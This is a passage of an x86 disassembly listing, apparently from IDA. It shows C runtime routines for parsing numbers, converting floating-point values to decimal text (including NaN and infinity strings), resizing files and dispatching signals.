loc_4171C8: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp bl, 31h ; jumptable 00416FFE case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_4171D8
cmp bl, 39h
jle short loc_41721C
loc_4171D8: ; CODE XREF: sub_416F96+23B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41725A
dec eax
dec eax
jz short loc_41724E
sub eax, 3
jnz loc_4172F7
loc_4171ED: ; CODE XREF: sub_416F96+292�j
push 8
jmp short loc_41725C
; ---------------------------------------------------------------------------
loc_4171F1: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
mov [ebp+var_24], edx ; jumptable 00416FFE case 8
jmp short loc_4171F9
; ---------------------------------------------------------------------------
loc_4171F6: ; CODE XREF: sub_416F96+266�j
mov bl, [edi]
inc edi
loc_4171F9: ; CODE XREF: sub_416F96+25E�j
cmp bl, 30h
jz short loc_4171F6
cmp bl, 31h
jl loc_41703A
cmp bl, 39h
jg loc_41703A
jmp short loc_41721C
; ---------------------------------------------------------------------------
loc_417212: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp bl, 31h ; jumptable 00416FFE case 7
jl short loc_417225
cmp bl, 39h
jg short loc_417225
loc_41721C: ; CODE XREF: sub_416F96+240�j
; sub_416F96+27A�j
push 9
loc_41721E: ; CODE XREF: sub_416F96+7B�j
pop eax
loc_41721F: ; CODE XREF: sub_416F96+230�j
dec edi
jmp loc_416FF2
; ---------------------------------------------------------------------------
loc_417225: ; CODE XREF: sub_416F96+27F�j
; sub_416F96+284�j
cmp bl, 30h
jz short loc_4171ED
loc_41722A: ; CODE XREF: sub_416F96+127�j
; sub_416F96+22C�j
mov edi, [ebp+arg_8]
jmp loc_4172F9
; ---------------------------------------------------------------------------
loc_417232: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
cmp [ebp+arg_18], 0 ; jumptable 00416FFE case 11
jz short loc_417262
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_41725A
dec eax
dec eax
jnz loc_4172F7
loc_41724E: ; CODE XREF: sub_416F96+24C�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_416FF2
; ---------------------------------------------------------------------------
loc_41725A: ; CODE XREF: sub_416F96+248�j
; sub_416F96+2AE�j
push 7
loc_41725C: ; CODE XREF: sub_416F96+8A�j
; sub_416F96+FD�j ...
pop eax
jmp loc_416FF2
; ---------------------------------------------------------------------------
loc_417262: ; CODE XREF: sub_416F96+2A0�j
push 0Ah
pop eax
dec edi
loc_417266: ; CODE XREF: sub_416F96+62�j
; sub_416F96+68�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 00416FFE case 10
jnz loc_416FF2
jmp loc_4172F9
; ---------------------------------------------------------------------------
loc_417274: ; CODE XREF: sub_416F96+68�j
; DATA XREF: .text:off_4173F3�o
mov [ebp+var_24], 1 ; jumptable 00416FFE case 9
xor esi, esi
loc_41727D: ; CODE XREF: sub_416F96+325�j
cmp dword_4214F4, 1
movzx eax, bl
jle short loc_417295
push 4
push eax
call sub_41328D
pop ecx
pop ecx
jmp short loc_4172A2
; ---------------------------------------------------------------------------
loc_417295: ; CODE XREF: sub_416F96+2F1�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_4172A2: ; CODE XREF: sub_416F96+2FD�j
test eax, eax
jz short loc_4172C2
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_4172BD
mov bl, [edi]
inc edi
jmp short loc_41727D
; ---------------------------------------------------------------------------
loc_4172BD: ; CODE XREF: sub_416F96+320�j
mov esi, 1451h
loc_4172C2: ; CODE XREF: sub_416F96+30E�j
mov [ebp+var_20], esi
loc_4172C5: ; CODE XREF: sub_416F96+35F�j
cmp dword_4214F4, 1
movzx eax, bl
jle short loc_4172DD
push 4
push eax
call sub_41328D
pop ecx
pop ecx
jmp short loc_4172EA
; ---------------------------------------------------------------------------
loc_4172DD: ; CODE XREF: sub_416F96+339�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_4172EA: ; CODE XREF: sub_416F96+345�j
test eax, eax
jz loc_41703A
mov bl, [edi]
inc edi
jmp short loc_4172C5
; ---------------------------------------------------------------------------
loc_4172F7: ; CODE XREF: sub_416F96+251�j
; sub_416F96+2B2�j
mov edi, ecx
loc_4172F9: ; CODE XREF: sub_416F96+A5�j
; sub_416F96+297�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_41739E
push 18h
pop eax
cmp [ebp+var_8], eax
jbe short loc_417325
cmp [ebp+var_41], 5
jl short loc_417319
inc [ebp+var_41]
loc_417319: ; CODE XREF: sub_416F96+37E�j
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
dec eax
inc [ebp+var_C]
jmp short loc_417328
; ---------------------------------------------------------------------------
loc_417325: ; CODE XREF: sub_416F96+378�j
mov eax, [ebp+var_10]
loc_417328: ; CODE XREF: sub_416F96+38D�j
cmp [ebp+var_8], 0
jbe loc_4173C5
jmp short loc_41733A
; ---------------------------------------------------------------------------
loc_417334: ; CODE XREF: sub_416F96+3A8�j
dec [ebp+var_8]
inc [ebp+var_C]
loc_41733A: ; CODE XREF: sub_416F96+39C�j
dec eax
cmp byte ptr [eax], 0
jz short loc_417334
lea eax, [ebp+var_3C]
push eax
push [ebp+var_8]
lea eax, [ebp+var_58]
push eax
call sub_416EB2
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_41735F
neg eax
loc_41735F: ; CODE XREF: sub_416F96+3C5�j
add eax, [ebp+var_C]
cmp [ebp+var_24], ecx
jnz short loc_41736A
add eax, [ebp+arg_10]
loc_41736A: ; CODE XREF: sub_416F96+3CF�j
cmp [ebp+var_28], ecx
jnz short loc_417372
sub eax, [ebp+arg_14]
loc_417372: ; CODE XREF: sub_416F96+3D7�j
cmp eax, 1450h
jg short loc_4173A7
cmp eax, 0FFFFEBB0h
jl short loc_4173BE
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_417BAD
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_4173CD
; ---------------------------------------------------------------------------
loc_41739E: ; CODE XREF: sub_416F96+36C�j
mov [ebp+var_18], 4
jmp short loc_4173C5
; ---------------------------------------------------------------------------
loc_4173A7: ; CODE XREF: sub_416F96+3E1�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_4173CD
; ---------------------------------------------------------------------------
loc_4173BE: ; CODE XREF: sub_416F96+3E8�j
mov [ebp+var_18], 1
loc_4173C5: ; CODE XREF: sub_416F96+396�j
; sub_416F96+40F�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_4173CD: ; CODE XREF: sub_416F96+406�j
; sub_416F96+426�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_411BA5
leave
retn
sub_416F96 endp
; ---------------------------------------------------------------------------
off_4173F3 dd offset loc_417005 ; DATA XREF: sub_416F96+68�r
dd offset loc_417055 ; jump table for switch statement
dd offset loc_4170A0
dd offset loc_4170CA
dd offset loc_417123
dd offset loc_417198
dd offset loc_4171C8
dd offset loc_417212
dd offset loc_4171F1
dd offset loc_417274
dd offset loc_417266
dd offset loc_417232
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417423 proc near ; CODE XREF: sub_415961+37�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_417490
mov byte ptr [ebx+2], 2Dh
jmp short loc_417494
; ---------------------------------------------------------------------------
loc_417490: ; CODE XREF: sub_417423+65�j
mov byte ptr [ebx+2], 20h
loc_417494: ; CODE XREF: sub_417423+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_4174A9
test edi, edi
jnz short loc_4174A9
cmp [ebp+arg_0], edi
jz loc_41759C
loc_4174A9: ; CODE XREF: sub_417423+77�j
; sub_417423+7B�j
cmp dx, si
jnz short loc_417526
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_4174C2
cmp [ebp+arg_0], 0
jz short loc_4174D1
loc_4174C2: ; CODE XREF: sub_417423+97�j
test edi, 40000000h
jnz short loc_4174D1
push offset a1Snan ; "1#SNAN"
jmp short loc_417517
; ---------------------------------------------------------------------------
loc_4174D1: ; CODE XREF: sub_417423+9D�j
; sub_417423+A5�j
test cx, cx
jz short loc_4174EB
cmp edi, 0C0000000h
jnz short loc_4174EB
cmp [ebp+arg_0], 0
jnz short loc_417512
push offset a1Ind ; "1#IND"
jmp short loc_4174FA
; ---------------------------------------------------------------------------
loc_4174EB: ; CODE XREF: sub_417423+B1�j
; sub_417423+B9�j
cmp edi, eax
jnz short loc_417512
cmp [ebp+arg_0], 0
jnz short loc_417512
push offset a1Inf ; "1#INF"
loc_4174FA: ; CODE XREF: sub_417423+C6�j
lea eax, [ebx+4]
push eax
call sub_40D8A0
mov byte ptr [ebx+3], 5
loc_417507: ; CODE XREF: sub_417423+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_41767E
; ---------------------------------------------------------------------------
loc_417512: ; CODE XREF: sub_417423+BF�j
; sub_417423+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_417517: ; CODE XREF: sub_417423+AC�j
lea eax, [ebx+4]
push eax
call sub_40D8A0
mov byte ptr [ebx+3], 6
jmp short loc_417507
; ---------------------------------------------------------------------------
loc_417526: ; CODE XREF: sub_417423+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_417BAD
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_417587
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_417975
pop ecx
pop ecx
loc_417587: ; CODE XREF: sub_417423+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_4175A5
movsx eax, si
add edi, eax
test edi, edi
jg short loc_4175A5
loc_41759C: ; CODE XREF: sub_417423+80�j
mov byte ptr [ebx+4], 30h
jmp loc_4176A2
; ---------------------------------------------------------------------------
loc_4175A5: ; CODE XREF: sub_417423+16E�j
; sub_417423+177�j
cmp edi, 15h
jle short loc_4175AD
push 15h
pop edi
loc_4175AD: ; CODE XREF: sub_417423+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_4175C3: ; CODE XREF: sub_417423+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_416E57
dec [ebp+arg_8]
pop ecx
jnz short loc_4175C3
test esi, esi
jge short loc_4175ED
neg esi
and esi, 0FFh
jle short loc_4175ED
loc_4175E0: ; CODE XREF: sub_417423+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_416E85
dec esi
pop ecx
jnz short loc_4175E0
loc_4175ED: ; CODE XREF: sub_417423+1B1�j
; sub_417423+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_41764A
mov [ebp+var_C], ecx
loc_4175FD: ; CODE XREF: sub_417423+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_416E57
lea eax, [ebp+var_18]
push eax
call sub_416E57
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_18]
push eax
call sub_416DF9
lea eax, [ebp+var_18]
push eax
call sub_416E57
mov al, byte ptr [ebp+var_E+1]
mov ecx, [ebp+arg_8]
and byte ptr [ebp+var_E+1], 0
add al, 30h
add esp, 14h
inc [ebp+arg_8]
dec [ebp+var_C]
mov [ecx], al
jnz short loc_4175FD
mov eax, [ebp+arg_8]
loc_41764A: ; CODE XREF: sub_417423+1D5�j
dec eax
mov cl, [eax]
dec eax
cmp cl, 35h
lea ecx, [ebx+4]
jl short loc_417697
jmp short loc_417661
; ---------------------------------------------------------------------------
loc_417658: ; CODE XREF: sub_417423+240�j
cmp byte ptr [eax], 39h
jnz short loc_417665
mov byte ptr [eax], 30h
dec eax
loc_417661: ; CODE XREF: sub_417423+233�j
cmp eax, ecx
jnb short loc_417658
loc_417665: ; CODE XREF: sub_417423+238�j
cmp eax, ecx
jnb short loc_41766D
inc eax
inc word ptr [ebx]
loc_41766D: ; CODE XREF: sub_417423+244�j
inc byte ptr [eax]
loc_41766F: ; CODE XREF: sub_417423+27A�j
sub al, bl
sub al, 3
mov [ebx+3], al
movsx eax, al
and byte ptr [eax+ebx+4], 0
loc_41767E: ; CODE XREF: sub_417423+EA�j
mov eax, [ebp+var_8]
loc_417681: ; CODE XREF: sub_417423+292�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_411BA5
leave
retn
; ---------------------------------------------------------------------------
loc_417691: ; CODE XREF: sub_417423+276�j
cmp byte ptr [eax], 30h
jnz short loc_41769B
dec eax
loc_417697: ; CODE XREF: sub_417423+231�j
cmp eax, ecx
jnb short loc_417691
loc_41769B: ; CODE XREF: sub_417423+271�j
cmp eax, ecx
jnb short loc_41766F
mov byte ptr [ecx], 30h
loc_4176A2: ; CODE XREF: sub_417423+17D�j
and word ptr [ebx], 0
and byte ptr [ebx+5], 0
xor eax, eax
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
inc eax
jmp short loc_417681
sub_417423 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4176B7 proc near ; CODE XREF: sub_415B4C+2A6�p
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1008h
call sub_40D9A0
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword_4C5DA0
mov [ebp+var_4], eax
jnb loc_4177F7
mov eax, ebx
sar eax, 5
mov eax, dword_4C5DC0[eax*4]
mov ecx, ebx
and ecx, 1Fh
test byte ptr [eax+ecx*8+4], 1
jz loc_4177F7
push 1
push esi
push ebx
call sub_4134BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz loc_417801
push 2
push esi
push ebx
call sub_4134BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_417801
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_4177A4
push 1000h
lea eax, [ebp+var_1008]
push esi
push eax
call sub_40D7B0
push 8000h
push ebx
call sub_417C39
add esp, 14h
mov [ebp+arg_0], eax
loc_417758: ; CODE XREF: sub_4176B7+C6�j
mov eax, 1000h
cmp edi, eax
jge short loc_417763
mov eax, edi
loc_417763: ; CODE XREF: sub_4176B7+A8�j
push eax
lea eax, [ebp+var_1008]
push eax
push ebx
call sub_41330B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_417781
sub edi, eax
test edi, edi
jg short loc_417758
jmp short loc_417797
; ---------------------------------------------------------------------------
loc_417781: ; CODE XREF: sub_4176B7+C0�j
cmp dword_4C5908, 5
jnz short loc_417794
mov dword_4C5904, 0Dh
loc_417794: ; CODE XREF: sub_4176B7+D1�j
or esi, 0FFFFFFFFh
loc_417797: ; CODE XREF: sub_4176B7+C8�j
push [ebp+arg_0]
push ebx
call sub_417C39
pop ecx
pop ecx
jmp short loc_4177E4
; ---------------------------------------------------------------------------
loc_4177A4: ; CODE XREF: sub_4176B7+7C�j
jge short loc_4177E4
push 0
push [ebp+arg_4]
push ebx
call sub_4134BF
push ebx
call sub_415FAA
add esp, 10h
push eax
call dword_419190 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_4177E4
mov dword_4C5904, 0Dh
call dword_4190AC ; RtlGetLastWin32Error
mov dword_4C5908, eax
loc_4177E4: ; CODE XREF: sub_4176B7+EB�j
; sub_4176B7:loc_4177A4�j ...
push 0
push [ebp+var_8]
push ebx
call sub_4134BF
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_417804
; ---------------------------------------------------------------------------
loc_4177F7: ; CODE XREF: sub_4176B7+25�j
; sub_4176B7+41�j
mov dword_4C5904, 9
loc_417801: ; CODE XREF: sub_4176B7+59�j
; sub_4176B7+6E�j
or eax, 0FFFFFFFFh
loc_417804: ; CODE XREF: sub_4176B7+13E�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_411BA5
leave
retn
sub_4176B7 endp
; =============== S U B R O U T I N E =======================================
sub_417813 proc near ; CODE XREF: sub_41784C+5A�p
mov ecx, dword_421630
mov eax, offset dword_4215B0
push esi
loc_41781F: ; CODE XREF: sub_417813+20�j
cmp [eax+4], edx
jz short loc_417835
lea esi, [ecx+ecx*2]
add eax, 0Ch
lea esi, ds:4215B0h[esi*4]
cmp eax, esi
jb short loc_41781F
loc_417835: ; CODE XREF: sub_417813+F�j
lea ecx, [ecx+ecx*2]
lea ecx, ds:4215B0h[ecx*4]
cmp eax, ecx
pop esi
jnb short loc_417849
cmp [eax+4], edx
jz short locret_41784B
loc_417849: ; CODE XREF: sub_417813+2F�j
xor eax, eax
locret_41784B: ; CODE XREF: sub_417813+34�j
retn
sub_417813 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41784C proc near ; CODE XREF: sub_413EDF+2417�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov eax, edi
dec eax
dec eax
jz short loc_4178B2
dec eax
dec eax
jz short loc_4178A4
sub eax, 4
jz short loc_4178A4
sub eax, 3
jz short loc_4178A4
sub eax, 4
jz short loc_417897
sub eax, 6
jz short loc_41788A
dec eax
jz short loc_41787D
or eax, 0FFFFFFFFh
jmp loc_417971
; ---------------------------------------------------------------------------
loc_41787D: ; CODE XREF: sub_41784C+27�j
mov esi, dword_4C5B34
mov eax, offset dword_4C5B34
jmp short loc_4178BD
; ---------------------------------------------------------------------------
loc_41788A: ; CODE XREF: sub_41784C+24�j
mov esi, dword_4C5B30
mov eax, offset dword_4C5B30
jmp short loc_4178BD
; ---------------------------------------------------------------------------
loc_417897: ; CODE XREF: sub_41784C+1F�j
mov esi, dword_4C5B38
mov eax, offset dword_4C5B38
jmp short loc_4178BD
; ---------------------------------------------------------------------------
loc_4178A4: ; CODE XREF: sub_41784C+10�j
; sub_41784C+15�j ...
mov edx, edi
call sub_417813
add eax, 8
mov esi, [eax]
jmp short loc_4178BD
; ---------------------------------------------------------------------------
loc_4178B2: ; CODE XREF: sub_41784C+C�j
mov esi, dword_4C5B2C
mov eax, offset dword_4C5B2C
loc_4178BD: ; CODE XREF: sub_41784C+3C�j
; sub_41784C+49�j ...
cmp esi, 1
jz loc_41796F
test esi, esi
jnz short loc_4178D1
push 3
call sub_40DE75
loc_4178D1: ; CODE XREF: sub_41784C+7C�j
push ebx
push 8
pop ecx
cmp edi, ecx
jz short loc_4178E3
cmp edi, 0Bh
jz short loc_4178E3
cmp edi, 4
jnz short loc_417909
loc_4178E3: ; CODE XREF: sub_41784C+8B�j
; sub_41784C+90�j
mov ebx, dword_4C59CC
and dword_4C59CC, 0
cmp edi, ecx
jnz short loc_417938
mov edx, dword_421634
mov [ebp+arg_0], edx
mov dword_421634, 8Ch
jmp short loc_41790C
; ---------------------------------------------------------------------------
loc_417909: ; CODE XREF: sub_41784C+95�j
mov ebx, [ebp+arg_0]
loc_41790C: ; CODE XREF: sub_41784C+BB�j
cmp edi, ecx
jnz short loc_417938
mov eax, dword_421628
mov ecx, dword_42162C
add ecx, eax
cmp eax, ecx
jge short loc_41793F
lea edx, [eax+eax*2]
lea edx, ds:4215B8h[edx*4]
sub ecx, eax
loc_41792D: ; CODE XREF: sub_41784C+E8�j
and dword ptr [edx], 0
add edx, 0Ch
dec ecx
jnz short loc_41792D
jmp short loc_41793F
; ---------------------------------------------------------------------------
loc_417938: ; CODE XREF: sub_41784C+A6�j
; sub_41784C+C2�j
and dword ptr [eax], 0
cmp edi, ecx
jnz short loc_41794D
loc_41793F: ; CODE XREF: sub_41784C+D3�j
; sub_41784C+EA�j
push dword_421634
push 8
call esi
pop ecx
pop ecx
jmp short loc_41795B
; ---------------------------------------------------------------------------
loc_41794D: ; CODE XREF: sub_41784C+F1�j
push edi
call esi
cmp edi, 0Bh
pop ecx
jz short loc_41795B
cmp edi, 4
jnz short loc_41796E
loc_41795B: ; CODE XREF: sub_41784C+FF�j
; sub_41784C+108�j
cmp edi, 8
mov dword_4C59CC, ebx
jnz short loc_41796E
mov eax, [ebp+arg_0]
mov dword_421634, eax
loc_41796E: ; CODE XREF: sub_41784C+10D�j
; sub_41784C+118�j
pop ebx
loc_41796F: ; CODE XREF: sub_41784C+74�j
xor eax, eax
loc_417971: ; CODE XREF: sub_41784C+2C�j
pop edi
pop esi
pop ebp
retn
sub_41784C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417975 proc near ; CODE XREF: sub_417423+15D�p
; sub_417BAD+6E�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+var_4], eax
xor eax, eax
xor ecx, ecx
mov cx, [ebx+0Ah]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_18], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov ax, [esi+0Ah]
push edi
mov edi, ecx
mov edx, 7FFFh
and ecx, edx
xor edi, eax
and eax, edx
and edi, 8000h
cmp ax, 7FFFh
lea edx, [ecx+eax]
mov [ebp+arg_0], edx
jnb loc_417B82
cmp cx, 7FFFh
jnb loc_417B82
cmp dx, 0BFFDh
ja loc_417B82
cmp dx, 3FBFh
ja short loc_4179EB
xor eax, eax
jmp short loc_417A25
; ---------------------------------------------------------------------------
loc_4179EB: ; CODE XREF: sub_417975+70�j
test ax, ax
mov edx, 7FFFFFFFh
jnz short loc_417A0D
inc [ebp+arg_0]
xor eax, eax
test [esi+8], edx
jnz short loc_417A0F
cmp [esi+4], eax
jnz short loc_417A0F
cmp [esi], eax
jnz short loc_417A0F
jmp loc_417B7C
; ---------------------------------------------------------------------------
loc_417A0D: ; CODE XREF: sub_417975+7E�j
xor eax, eax
loc_417A0F: ; CODE XREF: sub_417975+88�j
; sub_417975+8D�j ...
cmp cx, ax
jnz short loc_417A32
inc [ebp+arg_0]
test [ebx+8], edx
jnz short loc_417A32
cmp [ebx+4], eax
jnz short loc_417A32
cmp [ebx], eax
jnz short loc_417A32
loc_417A25: ; CODE XREF: sub_417975+74�j
mov [esi+8], eax
mov [esi+4], eax
mov [esi], eax
jmp loc_417B9D
; ---------------------------------------------------------------------------
loc_417A32: ; CODE XREF: sub_417975+9D�j
; sub_417975+A5�j ...
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
mov [ebp+var_8], eax
mov [ebp+arg_4], 5
loc_417A42: ; CODE XREF: sub_417975+12F�j
mov eax, [ebp+var_14]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_417A96
add eax, esi
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [ebx+8]
mov [ebp+var_10], ecx
mov [ebp+var_1C], eax
loc_417A5E: ; CODE XREF: sub_417975+11F�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
movzx eax, word ptr [eax]
imul eax, ecx
mov ecx, [ebp+var_8]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_416DD8
add esp, 0Ch
test eax, eax
jz short loc_417A89
mov eax, [ebp+var_8]
inc word ptr [eax]
loc_417A89: ; CODE XREF: sub_417975+10C�j
add [ebp+var_C], 2
sub [ebp+var_10], 2
dec [ebp+var_1C]
jnz short loc_417A5E
loc_417A96: ; CODE XREF: sub_417975+D6�j
add [ebp+var_8], 2
inc [ebp+var_14]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_417A42
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_417AD9
loc_417AB4: ; CODE XREF: sub_417975+15B�j
test byte ptr [ebp+var_20+3], 80h
jnz short loc_417AD2
lea eax, [ebp+var_28]
push eax
call sub_416E57
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
pop ecx
jg short loc_417AB4
loc_417AD2: ; CODE XREF: sub_417975+143�j
cmp word ptr [ebp+arg_0], 0
jg short loc_417B12
loc_417AD9: ; CODE XREF: sub_417975+13D�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_417B12
mov eax, [ebp+arg_0]
neg eax
movzx ebx, ax
add [ebp+arg_0], ebx
loc_417AF2: ; CODE XREF: sub_417975+191�j
test byte ptr [ebp+var_28], 1
jz short loc_417AFB
inc [ebp+var_18]
loc_417AFB: ; CODE XREF: sub_417975+181�j
lea eax, [ebp+var_28]
push eax
call sub_416E85
dec ebx
pop ecx
jnz short loc_417AF2
cmp [ebp+var_18], 0
jz short loc_417B12
or byte ptr [ebp+var_28], 1
loc_417B12: ; CODE XREF: sub_417975+162�j
; sub_417975+170�j ...
cmp word ptr [ebp+var_28], 8000h
ja short loc_417B29
mov eax, [ebp+var_28]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_417B5E
loc_417B29: ; CODE XREF: sub_417975+1A3�j
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_417B5B
and [ebp+var_28+2], 0
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_417B56
and [ebp+var_24+2], 0
cmp word ptr [ebp+var_20+2], 0FFFFh
jnz short loc_417B50
inc [ebp+arg_0]
mov word ptr [ebp+var_20+2], 8000h
jmp short loc_417B5E
; ---------------------------------------------------------------------------
loc_417B50: ; CODE XREF: sub_417975+1CE�j
inc word ptr [ebp+var_20+2]
jmp short loc_417B5E
; ---------------------------------------------------------------------------
loc_417B56: ; CODE XREF: sub_417975+1C2�j
inc [ebp+var_24+2]
jmp short loc_417B5E
; ---------------------------------------------------------------------------
loc_417B5B: ; CODE XREF: sub_417975+1B8�j
inc [ebp+var_28+2]
loc_417B5E: ; CODE XREF: sub_417975+1B2�j
; sub_417975+1D9�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_417B82
mov cx, word ptr [ebp+var_28+2]
mov [esi], cx
mov ecx, [ebp+var_24]
mov [esi+2], ecx
mov ecx, [ebp+var_20]
mov [esi+6], ecx
or eax, edi
loc_417B7C: ; CODE XREF: sub_417975+93�j
mov [esi+0Ah], ax
jmp short loc_417B9D
; ---------------------------------------------------------------------------
loc_417B82: ; CODE XREF: sub_417975+4F�j
; sub_417975+5A�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
